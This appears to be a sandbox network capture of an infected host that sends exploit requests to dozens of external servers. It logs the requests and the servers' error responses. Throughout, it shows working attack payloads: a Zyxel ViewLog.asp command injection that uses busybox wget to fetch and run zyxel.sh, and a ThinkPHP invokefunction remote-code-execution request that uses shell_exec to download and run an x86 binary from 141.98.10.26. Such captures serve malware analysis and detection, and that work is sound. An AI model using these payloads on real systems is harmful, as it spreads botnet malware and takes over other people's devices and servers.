Nov 22, 2023 08:40:02.906157970 CET	16126	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.23.1 Date: Wed, 22 Nov 2023 07:40:02 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://192.168.0.14/cgi-bin/ViewLog.asp:8090 Strict-Transport-Security: max-age=15768000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
790	192.168.2.23	47146	31.200.102.151	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:03.530163050 CET	16225	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
791	192.168.2.23	34920	31.200.121.182	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:03.530220032 CET	16225	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:07.680562019 CET	16653	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.823710918 CET	17465	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:25.854079962 CET	18897	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:49.914748907 CET	19772	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
792	192.168.2.23	52466	95.86.88.241	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:03.533345938 CET	16226	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:07.680567026 CET	16654	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
793	192.168.2.23	52902	88.137.97.119	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.307353020 CET	16262	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:04.864964008 CET	16374	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:05.988796949 CET	16506	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:08.192512989 CET	16728	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:12.799936056 CET	17339	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:21.758610010 CET	18429	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:39.676178932 CET	19763	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:41:16.535114050 CET	19785	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
794	192.168.2.23	54600	88.198.211.227	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.308999062 CET	16262	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:04.496210098 CET	16289	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:04 GMT Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 357 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 73 75 70 70 6f 72 74 40 69 6e 74 65 62 69 74 2e 64 65 22 3e 64 65 6d 6f 2e 68 6f 74 73 70 6f 74 2d 73 6f 6c 75 74 69 6f 6e 2e 6e 65 74 3c 2f 61 3e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.22 (Ubuntu) Server at <a href="mailto:support@intebit.de">demo.hotspot-solution.net</a> Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
795	192.168.2.23	48978	95.101.143.134	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.481985092 CET	16288	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:04.656660080 CET	16354	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:04 GMT Date: Wed, 22 Nov 2023 07:40:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 36 38 66 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 30 34 26 23 34 36 3b 33 31 35 32 33 31 30 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.868f655f.1700638804.31523108</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
796	192.168.2.23	33898	95.101.5.64	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.675795078 CET	16355	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:04.895806074 CET	16377	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:04 GMT Date: Wed, 22 Nov 2023 07:40:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 30 34 26 23 34 36 3b 31 33 62 30 63 66 62 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.663f655f.1700638804.13b0cfbf</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
797	192.168.2.23	49194	95.101.242.183	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.676583052 CET	16355	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:05.462645054 CET	16488	IN	HTTP/1.1 502 Bad Gateway Server: nginx Content-Type: text/html Content-Length: 166 Date: Wed, 22 Nov 2023 07:40:05 GMT Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
798	192.168.2.23	35004	95.141.86.58	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.684838057 CET	16356	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
799	192.168.2.23	35072	95.101.98.13	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.698847055 CET	16357	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:04.916021109 CET	16379	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:04 GMT Date: Wed, 22 Nov 2023 07:40:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 32 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 30 36 33 38 38 30 34 26 23 34 36 3b 33 39 35 35 63 38 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b2341060.1700638804.3955c8e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
800	192.168.2.23	50046	95.100.142.73	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.698947906 CET	16358	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:04.916127920 CET	16379	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:04 GMT Date: Wed, 22 Nov 2023 07:40:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 35 36 61 36 34 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 30 34 26 23 34 36 3b 31 62 32 35 30 30 34 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b56a645f.1700638804.1b250048</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
801	192.168.2.23	56396	95.217.105.158	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.851468086 CET	16373	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:05.046276093 CET	16384	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:04 GMT Server: Apache Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at localhost Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
802	192.168.2.23	38380	95.216.12.103	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.852922916 CET	16373	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:05.048132896 CET	16384	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
803	192.168.2.23	41194	95.140.17.11	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.877720118 CET	16376	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
